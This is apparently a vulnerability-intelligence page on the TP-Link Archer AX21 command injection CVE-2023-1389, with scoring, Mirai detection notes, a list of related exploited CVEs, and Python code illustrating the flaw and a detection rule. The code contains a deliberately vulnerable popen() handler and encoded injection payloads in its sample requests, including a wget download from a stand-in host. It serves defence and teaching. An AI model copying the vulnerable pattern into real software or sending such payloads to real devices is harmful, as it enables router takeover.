CVE-2023-1389
Published 2023-03-15
Priority P1 · 91 · high · 8.8 (CVSS 3.1)
Vector: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Tags: KEV · ITW · Exploit · Initial access
CISA Known Exploited Vulnerability, due 2023-05-22
Exploited in the wild
EPSS: 100.00% (100.0th percentile)
TP-Link Archer AX21 (AX1800) firmware versions before 1.1.4 Build 20230219 contained a command injection vulnerability in the country form of the /cgi-bin/luci;stok=/locale endpoint on the web management interface. Specifically, the country parameter of the write operation was not sanitized before being used in a call to popen(), allowing an unauthenticated attacker to inject commands, which would be run as root, with a simple POST request.
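The bug class described above, as an added runnable illustration. This is not the router firmware (the page says the real handler is a CGI endpoint that reaches C popen()); it is example code written for this page. Python's os.popen() runs its argument through /bin/sh exactly as C popen() does, so the vulnerable handler below reproduces the flaw faithfully. The command name `echo` is a stand-in for whatever locale-setting command the firmware actually runs (the page does not name it), and the two-letter country-code format is an assumption made for the allow-list.

```python
import os
import re
import subprocess

# Constructed stand-in for the firmware's real command; the page does not
# name it, and echo is only used here so the injection is observable.
LOCALE_CMD = "echo"

# Assumed format for a legitimate value: exactly two upper-case letters.
COUNTRY_RE = re.compile(r"^[A-Z]{2}$")


def set_country_vulnerable(country: str) -> str:
    """The flawed pattern: the request parameter is pasted into a command
    line and handed to popen(), which runs it via /bin/sh. A value such as
    'US; echo INJECTED' is therefore two commands, not one argument."""
    with os.popen(f"{LOCALE_CMD} {country}") as proc:
        return proc.read()


def set_country_hardened(country: str) -> str:
    """Allow-list the value first, then exec with an argv list and no shell,
    so that even a value which slipped past the check could not be parsed
    as shell syntax. Both layers matter: shell=False alone still lets a
    value be misread as an option by the target command."""
    if not COUNTRY_RE.fullmatch(country):
        raise ValueError(f"rejected country value: {country!r}")
    result = subprocess.run(
        [LOCALE_CMD, country], capture_output=True, text=True, check=True
    )
    return result.stdout


if __name__ == "__main__":
    benign = "US"
    # Constructed value of the kind an attacker's POST could carry.
    malicious = "US; echo INJECTED"
    print("vulnerable/benign   :", set_country_vulnerable(benign).strip())
    print("vulnerable/malicious:", set_country_vulnerable(malicious).strip())
    print("hardened/benign     :", set_country_hardened(benign).strip())
    try:
        set_country_hardened(malicious)
    except ValueError as exc:
        print("hardened/malicious  :", exc)
```

Run it and the vulnerable path prints INJECTED on a second line, which is the whole vulnerability in miniature: the injected command runs with the privileges of the web server process, root on the affected firmware according to the description above.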
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| tp-link | archer_ax21_firmware | < 1.1.4 | 1.1.4 |
Detection & IOCs (extracted from sources)
- The vulnerability is an unauthenticated command injection in the locale API's 'country' form write operation on the TP-Link Archer AX21 web management interface. Monitor for HTTP POST/write requests to the locale API endpoint targeting the 'country' field with shell metacharacters.
- Mirai payloads for CVE-2023-1389 use XOR keys 0x00 and 0x22 to encrypt strings. Scanning for these XOR-encoded Mirai binaries can aid in payload identification.
- Mirai bots exploiting CVE-2023-1389 use specific User-Agent strings and server headers including 'cloudflare-nginx' and 'dosarrest' to blend DDoS traffic with legitimate traffic. Alert on these headers in outbound traffic from router/IoT devices.
- CVE-2023-1389 exploitation activity was first observed on April 11, 2023, initially targeting devices in Eastern Europe. Correlate telemetry for TP-Link Archer AX21 exploitation attempts originating from Eastern European IPs around that timeframe.
- CVE-2023-1389 was the 3rd most exploited CVE by volume in March 2025 with 4,698 attempts recorded. Prioritize detection rules for this CVE given its continued active exploitation.
- A Mirai-based botnet campaign abused CVE-2023-1389 on TP-Link Archer AX21 routers targeting Brazilian internet providers, using open DNS servers for high-volume amplification attacks. Monitor for anomalous DNS amplification traffic from compromised TP-Link devices.
- The Mirai botnet payloads are downloaded and executed using a brute-force methodology to find the appropriate payload for the target system architecture, meaning multiple architecture-specific binaries are tried sequentially. Detection should account for multiple sequential download attempts from the same C2 IP across different architecture paths.
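The first detection item in the list above, worked as an added example; it is written for this page and is not a rule from any of the cited sources. It runs over a handful of constructed request records of the kind a reverse proxy, WAF or IDS can produce when it captures POST bodies. The query-string layout (`form=country&operation=write`) is assumed for the example; the page only says the 'country' form's write operation. A request is flagged when it is a POST to the locale endpoint, addresses that form and operation, and its decoded `country` value contains a shell metacharacter. The value is decoded a second time so that a double-encoded payload is caught as well.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Characters that let a value escape its intended argument once it reaches
# a shell via popen(); a legitimate country code never contains any of them.
SHELL_META = set(";|&$`\n\r(){}<>'\"\\")

# The endpoint named on this page. The stok= session token is empty in an
# unauthenticated request, so it is matched as optional content.
LOCALE_PATH = re.compile(r"/cgi-bin/luci(?:;stok=[^/]*)?/locale")

# Constructed request records (not real traffic); RFC 5737 documentation
# addresses and an .invalid hostname are used throughout.
SAMPLE_REQUESTS = [
    {"src": "192.0.2.10", "method": "POST",
     "url": "/cgi-bin/luci;stok=/locale?form=country&operation=write",
     "body": "country=US"},
    {"src": "198.51.100.7", "method": "POST",
     "url": "/cgi-bin/luci;stok=/locale?form=country&operation=write",
     "body": "country=%24%28id%29"},
    {"src": "198.51.100.8", "method": "POST",
     "url": "/cgi-bin/luci;stok=/locale?form=country&operation=write",
     "body": "country=US%3Bwget+http%3A%2F%2Fexample.invalid%2Fx+-O+%2Ftmp%2Fx"},
    {"src": "203.0.113.5", "method": "GET",
     "url": "/cgi-bin/luci;stok=/locale?form=country&operation=read",
     "body": ""},
    {"src": "203.0.113.6", "method": "POST",
     "url": "/cgi-bin/luci;stok=/admin/status",
     "body": "country=%3Bid"},
]


def is_locale_write(method, path, query):
    """True for a POST to the locale endpoint that addresses the 'country'
    form's write operation. The form/operation parameter names are an
    assumption of this example, not something stated on the page."""
    if method.upper() != "POST" or not LOCALE_PATH.fullmatch(path):
        return False
    q = parse_qs(query)
    return q.get("form") == ["country"] and q.get("operation") == ["write"]


def inspect_request(record):
    """Return a finding dict for a suspicious record, else None.
    record: dict with src, method, url and the raw url-form-encoded body."""
    parts = urlsplit(record["url"])
    if not is_locale_write(record["method"], parts.path, parts.query):
        return None
    body = parse_qs(record["body"], keep_blank_values=True)
    for raw in body.get("country", []):
        value = unquote(raw)  # second decode catches double-encoded payloads
        hit = sorted(c for c in SHELL_META if c in value)
        if hit:
            return {"src": record["src"], "country": value, "meta": hit}
    return None


def scan(records):
    """Apply inspect_request to every record and keep the findings."""
    return [f for f in map(inspect_request, records) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_REQUESTS):
        print(f"{finding['src']}: country={finding['country']!r} "
              f"metacharacters={''.join(finding['meta'])}")
```

Plain access logs rarely contain POST bodies, so this rule needs a sensor that captures them. Where only the request line is available, the fallback is to alert on any write to the locale endpoint with an empty stok= token at all: the page states the endpoint is reachable unauthenticated, and a legitimate administrator session carries a token.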
CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | 3.1 | 8.8 | HIGH | CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| vulncheck | | 10.0 | CRITICAL | |
| cisa | | 8.8 | HIGH | |
The sources disagree on reach. NVD's vector scores the attack vector as Adjacent (AV:A), whereas a 10.0 is only reachable with AV:N and a changed scope, and the ZDI write-up cited in the references below calls this a WAN-side vulnerability. For prioritization, treat it as network-reachable; the KEV listing and the EPSS score point the same way.
vulncheck·2024·CVSS 6.3
CVE-2024-3721 [MEDIUM] TBK DVR Command Injection Vulnerability
A vulnerability was found in TBK DVR-4104 and DVR-4216 up to 20240412 and classified as critical. This issue affects some unknown processing of the file /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___. The manipulation of the argument mdb/mdc leads to os command injection. The attack may be initiated remotely.
Affected: TBK TBK DVR
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-04-21&host_type=src&vulnerability=cve-2024-3721; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-04-22&host_type=src&vulner
vulncheck·2024·CVSS 9.8
CVE-2024-3273 [CRITICAL] CWE-77 D-Link Multiple NAS Devices Command Injection Vulnerability
D-Link DNS-320L, DNS-325, DNS-327L, and DNS-340L contain a command injection vulnerability. When combined with CVE-2024-3272, this can lead to remote, unauthorized code execution.
Affected: D-Link Multiple NAS Devices
Required Action: This vulnerability affects legacy D-Link products. All associated hardware revisions have reached their end-of-life (EOL) or end-of-service (EOS) life cycle and should be retired and replaced per vendor instructions.
Exploitation References: https://infosec.exchange/@greynoise/112236315274772968; https://www.greynoise.io/blog/cve-2024-3273-d-link-nas-rce-exploited-in-the-wild; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-04-09&host_type=src&vulnerability=cve-
vulncheck·2024·CVSS 9.8
CVE-2024-23692 [CRITICAL] CWE-1336 Rejetto HTTP File Server Improper Neutralization of Special Elements Used in a Template Engine Vulnerability
Rejetto HTTP File Server contains an improper neutralization of special elements used in a template engine vulnerability. This allows a remote, unauthenticated attacker to execute commands on the affected system by sending a specially crafted HTTP request.
Affected: Rejetto HTTP File Server
Required Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.
Known Ransomware Campaign Use: Known
Exploitation References: https://asec.ahnlab.com/ko/67509/; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://cert.gov.ua/article/6280129; https://www.f5.com/labs/articles/threat-intelligen
vulncheck·2024·CVSS 8.8
CVE-2024-30891 [HIGH] Tenda AC18 V15.03.05.05 Firmware formexeCommand Function Command Injection
A command injection vulnerability exists in /goform/exeCommand in Tenda AC18 v15.03.05.05, which allows attackers to construct cmdinput parameters for arbitrary command execution.
Affected: Tenda AC18
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-august-2024; https://www.f5.com/labs/articles/threat-intelligence/botpoke-scanner-switches-ip; https://www.f5.com/labs/articles/threat-intelligence/continued-scanning-for-cve-2023-1389; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/ma
vulncheck·2024·CVSS 9.8
CVE-2024-4577 [CRITICAL] CWE-78 PHP-CGI OS Command Injection Vulnerability
PHP, specifically Windows-based PHP used in CGI mode, contains an OS command injection vulnerability that allows for arbitrary code execution. This vulnerability is a patch bypass for CVE-2012-1823.
Affected: PHP Group PHP
Required Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.
Known Ransomware Campaign Use: Known
Exploitation References: https://www.imperva.com/blog/imperva-protects-against-critical-php-vulnerability-cve-2024-4577/; https://x.com/Shadowserver/status/1799053497490698548; https://infosec.exchange/@ntkramer/112582375921224782; https://api.vulncheck.com/v3/index/sans-dshield?cve=CVE-2024-4577; https://isc.sans.edu/diary/Attacker%20Probing%20for%20New%20PHP%20Vu
vulncheck·2024·CVSS 7.2
CVE-2024-12856 [HIGH] Four-Faith adjust_sys_time OS Command Injection
Four-Faith industrial routers are vulnerable to an operating system command injection vulnerability.
Affected: Four-Faith F3x24 and F3x36
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://ducklingstudio.blog.fc2.com/blog-entry-392.html; https://vulncheck.com/blog/four-faith-cve-2024-12856; https://www.cve.org/CVERecord?id=CVE-2024-12856; https://blog.xlab.qianxin.com/gayfemboy-en/; https://www.f5.com/labs/articles/threat-intelligence/continued-scanning-for-cve-2023-1389; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2025-02-08&host_type=src&vulnerability=cve-2024-12856;
ghsa_unreviewed·2023-03-16
CVE-2023-1389 [HIGH] CWE-77 GHSA-h49r-m2rg-6pgf: TP-Link Archer AX21 (AX1800) firmware versions before 1
Description: identical to the NVD description at the top of this page.
vulncheck·2023·CVSS 5.3
CVE-2023-23752 [MEDIUM] CWE-284 Joomla! Improper Access Control Vulnerability
Joomla! contains an improper access control vulnerability that allows unauthorized access to webservice endpoints.
Affected: Joomla! Joomla!
Required Action: Apply mitigations per vendor instructions or discontinue use of the product if mitigations are unavailable.
Exploitation References: https://isc.sans.edu/diary/rss/29614; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-11-13&host_type=src&vulnerability=cve-2023-23752; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-11-14&host_type=src&vulnerability=cve-2023-23752; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-11-15&host_type=src&vulnerability=cve-2023-23752; https://dashboard.shad
vulncheck·2023·CVSS 4.3
CVE-2023-25651 [MEDIUM] ZTE mf833u1_firmware Improper Input Validation
There is a SQL injection vulnerability in some ZTE mobile internet products. Due to insufficient input validation of SMS interface parameter, an authenticated attacker could use the vulnerability to execute SQL injection and cause information leak.
Affected: ZTE mf833u1_firmware
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-august-2024; https://www.f5.com/labs/articles/threat-intelligence/botpoke-scanner-switches-ip; https://www.f5.com/labs/articles/threat-intelligence/continued-scanning-for-cve-2023-1389
vulncheck·2023·CVSS 9.8
CVE-2023-26134 [CRITICAL] git-commit-info_project git-commit-info Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
Versions of the package git-commit-info before 2.0.2 are vulnerable to Command Injection such that the package-exported method gitCommitInfo () fails to sanitize its parameter commit, which later flows into a sensitive command execution API. As a result, attackers may inject malicious commands once they control the hash content.
Affected: git-commit-info_project git-commit-info
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.f5.com/labs/articles/threat-intelligence/continued-scanning-for-cve-2023-1389
vulncheck·2023·CVSS 8.8
CVE-2023-1389 [HIGH] CWE-77 TP-Link Archer AX-21 Command Injection Vulnerability
TP-Link Archer AX-21 contains a command injection vulnerability that allows for remote code execution.
Affected: TP-Link Archer AX21
Required Action: Apply updates per vendor instructions.
Exploitation References: https://api.vulncheck.com/v3/index/sans-dshield?cve=CVE-2023-1389; https://www.zerodayinitiative.com/blog/2023/4/21/tp-link-wan-side-vulnerability-cve-2023-1389-added-to-the-mirai-botnet-arsenal; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://www.fortinet.com/blog/threat-research/condi-ddos-botnet-spreads-via-tp-links-cve-2023-1389; https://unit42.paloaltonetworks.com/mirai-variant-targets-iot-exploits/; https://www.fortinet.com/blog/threat-research/Iz1h9-campaign-enhances-arsen
vulncheck·2023·CVSS 9.8
CVE-2023-25157 [CRITICAL] OSGeo GeoServer Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
GeoServer is an open source software server written in Java that allows users to share and edit geospatial data. GeoServer includes support for the OGC Filter expression language and the OGC Common Query Language (CQL) as part of the Web Feature Service (WFS) and Web Map Service (WMS) protocols. CQL is also supported through the Web Coverage Service (WCS) protocol for ImageMosaic coverages. Users are advised to upgrade to either version 2.21.4, or version 2.22.2 to resolve this issue. Users unable to upgrade should disable the PostGIS Datastore *encode functions* setting to mitigate ``strEndsWith``, ``strStartsWith`` and ``PropertyIsLike `` misuse and enable the PostGIS DataStore *prepared
vulncheck·2023·CVSS 9.8
CVE-2023-23333 [CRITICAL] contec solarview_compact Improper Neutralization of Special Elements used in a Command ('Command Injection')
There is a command injection vulnerability in SolarView Compact through 6.00, attackers can execute commands by bypassing internal restrictions through downloader.php.
Affected: contec solarview_compact
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://vulncheck.com/blog/solarview-exploitation; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-11-16&host_type=src&vulnerability=cve-2023-23333; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-11-22&host_type=src&vulnerability=cv
vulncheck·2022·CVSS 7.2
CVE-2022-24847 [HIGH] OSGeo GeoServer Improper Input Validation
GeoServer is an open source software server written in Java that allows users to share and edit geospatial data. The GeoServer security mechanism can perform an unchecked JNDI lookup, which in turn can be used to perform class deserialization and result in arbitrary code execution. The same can happen while configuring data stores with data sources located in JNDI, or while setting up the disk quota mechanism. In order to perform any of the above changes, the attack needs to have obtained admin rights and use either the GeoServer GUI, or its REST API. The lookups are going to be restricted in GeoServer 2.21.0, 2.20.4, 1.19.6. Users unable to upgrade should restrict access to the `geoserver/web` and `geoserver/rest` via a firewall and ensure that t
vulncheck·2022·CVSS 9.8
CVE-2022-22954 [CRITICAL] CWE-94 VMware Workspace ONE Access and Identity Manager Server-Side Template Injection Vulnerability
VMware Workspace ONE Access and Identity Manager allow for remote code execution due to server-side template injection.
Affected: VMware Workspace ONE Access and Identity Manager
Required Action: Apply updates per vendor instructions.
Known Ransomware Campaign Use: Known
Exploitation References: https://www.vmware.com/security/advisories/VMSA-2022-0011.html; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://blog.morphisec.com/vmware-identity-manager-attack-backdoor; https://cisa.gov/news-events/alerts/2022/05/18/cisa-issues-emergency-directive-and-releases-advisory-related-vmware; https://cybersecurity.att.com/blogs/labs-research/rapidly-evolving-iot
vulncheck·2022·CVSS 9.8
CVE-2022-47945 [CRITICAL] thinkphp ThinkPHP Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
ThinkPHP Framework before 6.0.14 allows local file inclusion via the lang parameter when the language pack feature is enabled (lang_switch_on=true). An unauthenticated and remote attacker can exploit this to execute arbitrary operating system commands, as demonstrated by including pearcmd.php.
Affected: thinkphp ThinkPHP
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-04-11&host_type=src&vulnerability=cve-2022-47945; https://dashboard.shadowserver.org/statistics/honeypot/vulnera
vulncheck·2022·CVSS 8.8
CVE-2022-41040 [HIGH] CWE-918 Microsoft Exchange Server Server-Side Request Forgery Vulnerability
Microsoft Exchange Server allows for server-side request forgery. Dubbed "ProxyNotShell," this vulnerability is chainable with CVE-2022-41082 which allows for remote code execution.
Affected: Microsoft Exchange Server
Required Action: Apply updates per vendor instructions.
Known Ransomware Campaign Use: Known
Exploitation References: https://gteltsc.vn/blog/warning-new-attack-campaign-utilized-a-new-0day-rce-vulnerability-on-microsoft-exchange-server-12715.html; https://api.msrc.microsoft.com/cvrf/v3.0/cvrf/2022-Sep; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit; https://securelist.com/cve-20
vulncheck·2022·CVSS 9.8
CVE-2022-26134 [CRITICAL] CWE-917 Atlassian Confluence Server and Data Center Remote Code Execution Vulnerability
Atlassian Confluence Server and Data Center contain a remote code execution vulnerability that allows for an unauthenticated attacker to perform remote code execution.
Affected: Atlassian Confluence Server and Data Center
Required Action: Immediately block all internet traffic to and from affected products AND apply the update per vendor instructions [https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html] OR remove the affected products by the due date on the right. Note: Once the update is successfully deployed, agencies can reassess the internet blocking rules.
Known Ransomware Campaign Use: Known
Exploitation References: https://www.countercraftsec.com/blog/active-
vulncheck·2022·CVSS 9.8
CVE-2022-1040 [CRITICAL] CWE-158 Sophos Firewall Authentication Bypass Vulnerability
An authentication bypass vulnerability in User Portal and Webadmin of Sophos Firewall allows for remote code execution.
Affected: Sophos Firewall
Required Action: Apply updates per vendor instructions.
Known Ransomware Campaign Use: Known
Exploitation References: https://www.bleepingcomputer.com/news/security/hackers-tried-to-use-sophos-firewall-zero-day-to-deploy-ransomware/; https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://api.vulncheck.com/v3/index/sans-dshield?cve=CVE-2022-1040; https://www.volexity.com/blog/2022/06/15/driftingcloud-zero-day-sophos-firewall-exploitation-and-an-insidious-breach/; ht
vulncheck·2022·CVSS 9.8
CVE-2022-0885 [CRITICAL] memberhero member_hero Improper Control of Generation of Code ('Code Injection')
The Member Hero WordPress plugin through 1.0.9 lacks authorization checks, and does not validate the a request parameter in an AJAX action, allowing unauthenticated users to call arbitrary PHP functions with no arguments.
Affected: memberhero member_hero
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.f5.com/labs/articles/threat-intelligence/sensor-intel-series-top-cves-august-2024; https://www.f5.com/labs/articles/threat-intelligence/botpoke-scanner-switches-ip; https://www.f5.com/labs/articles/threat-intelligence/continued-scanning-for-cve-2023-1389
vulncheck·2022·CVSS 6.1
CVE-2022-0346 [MEDIUM] xmlsitemapgenerator xml_sitemap_generator Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
The XML Sitemap Generator for Google WordPress plugin before 2.0.4 does not validate a parameter which can be set to an arbitrary value, thus causing XSS via error message or RCE if allow_url_include is turned on.
Affected: xmlsitemapgenerator xml_sitemap_generator
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-01-02&host_type=src&vulnerability=cve-2022-0346; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-01-22&h
vulncheck·2022·CVSS 6.1
CVE-2022-0653 [MEDIUM] cozmoslabs profile_builder Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
The Profile Builder – User Profile & User Registration Forms WordPress plugin is vulnerable to Cross-Site Scripting due to insufficient escaping and sanitization of the site_url parameter found in the ~/assets/misc/fallback-page.php file, which allows attackers to inject arbitrary web scripts onto a page that executes them whenever a user clicks on a link specially crafted by the attacker. This affects versions up to and including 3.6.1.
Affected: cozmoslabs profile_builder
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.f5.com/labs/articl
vulncheck·2022·CVSS 8.0
CVE-2022-2488 [HIGH] wavlink wl-wn535k2 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
A vulnerability was found in WAVLINK WN535K2 and WN535K3 and classified as critical. This issue affects some unknown processing of the file /cgi-bin/touchlist_sync.cgi. The manipulation of the argument IP leads to os command injection. The exploit has been disclosed to the public and may be used.
Affected: wavlink wl-wn535k2
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-11-13&host_type=src&vulnerability=cve-2022-2488; https://dashboard.shadowserver.org/statistics/
vulncheck·2022·CVSS 10.0
CVE-2022-22947 [CRITICAL] CWE-94 VMware Spring Cloud Gateway Code Injection Vulnerability
Spring Cloud Gateway applications are vulnerable to a code injection attack when the Gateway Actuator endpoint is enabled, exposed and unsecured.
Affected: VMware Spring Cloud Gateway
Required Action: Apply updates per vendor instructions.
Exploitation References: https://www.botconf.eu/wp-content/uploads/2022/05/Botconf2022-24-PalotayZsigovits.pdf; https://www.bleepingcomputer.com/news/security/microsoft-sysrv-botnet-targets-windows-linux-servers-with-new-exploits/; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://www.malwarebytes.com/blog/news/2022/05/sysrv-botnet-is-out-to-mine-monero-on-your-windows-and-linux-servers; https://cybersecurity.att.com/blogs/labs-research/rapidly-evolvin
vulncheck·2022·CVSS 9.8
CVE-2022-35914 [CRITICAL] CWE-74 Teclib GLPI Remote Code Execution Vulnerability
Teclib GLPI contains a remote code execution vulnerability in the third-party library, htmlawed.
Affected: Teclib GLPI
Required Action: Apply updates per vendor instructions.
Exploitation References: https://glpi-project.org/security-update-10-0-3-and-9-5-9/; https://twitter.com/Shadowserver/status/1580475994590220288; https://web.archive.org/web/20230318134256/https://unit42.paloaltonetworks.com/network-security-trends-aug-oct-2022/; https://www.cert.ssi.gouv.fr/uploads/CERTFR-2023-CTI-001.pdf; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://www.microsoft.com/content/dam/microsoft/final/en-us/microsoft-brand/documents/MDDR_FINAL_2023_1004.pdf; https://dashboard.shadowserver.org/statistics/hone
vulncheck·2022·CVSS 9.8
CVE-2022-22965 [CRITICAL] CWE-94 Spring Framework JDK 9+ Remote Code Execution Vulnerability
Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding.
Affected: VMware Spring Framework
Required Action: Apply updates per vendor instructions.
Known Ransomware Campaign Use: Known
Exploitation References: https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://www.trendmicro.com/en_us/research/22/d/cve-2022-22965-analyzing-the-exploitation-of-spring4shell-vulner.html; https://unit42.paloaltonetworks.com/recent-exploits-network-security-trends/; https://www.fortinet.com/blog/threat-research/zerobot-new-go-based-botnet-campaign-targets-multiple-vulnerabilities; https://blog.netlab.360.com/new-ddos-botnet-wszeor/; https:
vulncheck·2022·CVSS 8.0
CVE-2022-2486 [HIGH] wavlink wl-wn535k2 Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
A vulnerability, which was classified as critical, was found in WAVLINK WN535K2 and WN535K3. This affects an unknown part of the file /cgi-bin/mesh.cgi?page=upgrade. The manipulation of the argument key leads to os command injection. The exploit has been disclosed to the public and may be used.
Affected: wavlink wl-wn535k2
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://web.archive.org/web/20230318134256/https://unit42.paloaltonetworks.com/network-security-trends-aug-oct-2022/; https://dashboard.shadowserver.org/statistics/honeypot/vulnera
vulncheck·2022·CVSS 6.5
CVE-2022-40734 [MEDIUM] unisharp laravel_filemanager Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')
UniSharp laravel-filemanager (aka Laravel Filemanager) before 2.6.4 allows download?working_dir=%2F.. directory traversal to read arbitrary files, as exploited in the wild in June 2022. This is related to league/flysystem before 2.0.0.
Affected: unisharp laravel_filemanager
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.cve.org/CVERecord?id=CVE-2022-40734; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-01-22&host_type=src&vulnerability=cve-2022-40734; https://dashboard.shadowserver.org/statistics/hone
vulncheck·2022·CVSS 9.8
CVE-2022-21587 [CRITICAL] CWE-306 Oracle E-Business Suite Unspecified Vulnerability
Oracle E-Business Suite contains an unspecified vulnerability that allows an unauthenticated attacker with network access via HTTP to compromise Oracle Web Applications Desktop Integrator.
Affected: Oracle E-Business Suite
Required Action: Apply updates per vendor instructions.
Known Ransomware Campaign Use: Known
Exploitation References: https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://go.crowdstrike.com/rs/281-OBQ-266/images/report-crowdstrike-2023-threat-hunting-report.pdf; https://information.rapid7.com/rs/411-NAK-970/images/Rapid7-2023-Mid-Year-Threat-Review.pdf; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-12-03&host_type=src&vulnerability=cve-2022-
VulnCheck
Apache Spark Command Injection Vulnerability
vulncheck·2022·CVSS 8.8
CVE-2022-33891 [HIGH] CWE-78 Apache Spark Command Injection Vulnerability
Apache Spark contains a command injection vulnerability via Spark User Interface (UI) when Access Control Lists (ACLs) are enabled.
Affected: Apache Spark
Required Action: Apply updates per vendor instructions.
Exploitation References: https://www.microsoft.com/en-us/security/blog/2022/12/21/microsoft-research-uncovers-new-zerobot-capabilities/; https://fortiguard.fortinet.com/threat-signal-report/4926/new-zerobot-variant-exploits-additional-vulnerabilities-for-propagation; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2024-01-22&host_type=src&vulnerability=cve-2022-33891; https://dashboard.shadowserver.org/statistics/honeypot
VulnCheck
Fortinet FortiOS Heap-Based Buffer Overflow Vulnerability
vulncheck·2022·CVSS 9.8
CVE-2022-42475 [CRITICAL] CWE-197 Fortinet FortiOS Heap-Based Buffer Overflow Vulnerability
Multiple versions of Fortinet FortiOS SSL-VPN contain a heap-based buffer overflow vulnerability which can allow an unauthenticated, remote attacker to execute arbitrary code or commands via specifically crafted requests.
Affected: Fortinet FortiOS
Required Action: Apply updates per vendor instructions.
Known Ransomware Campaign Use: Known
Exploitation References: https://docs.google.com/spreadsheets/d/1lkNJ0uQwbeC1ZTRrxdtuPLCIl7mlUreoKfSIgajnSyY/edit; https://www.fortiguard.com/psirt/FG-IR-22-398; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://www.mandiant.com/resources/blog/chinese-actors-exploit-fortios-flaw; https://www.prio-n.com/a-year-in-review-2022-100-vulnerabilities-you-sh
VulnCheck
hytec hwl-2511-ss_firmware Improper Neutralization of Special Elements used in a Command ('Command Injection')
vulncheck·2022·CVSS 9.8
CVE-2022-36553 [CRITICAL] hytec hwl-2511-ss_firmware Improper Neutralization of Special Elements used in a Command ('Command Injection')
Hytec Inter HWL-2511-SS v1.05 and below was discovered to contain a command injection vulnerability via the component /www/cgi-bin/popen.cgi.
Affected: hytec hwl-2511-ss_firmware
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
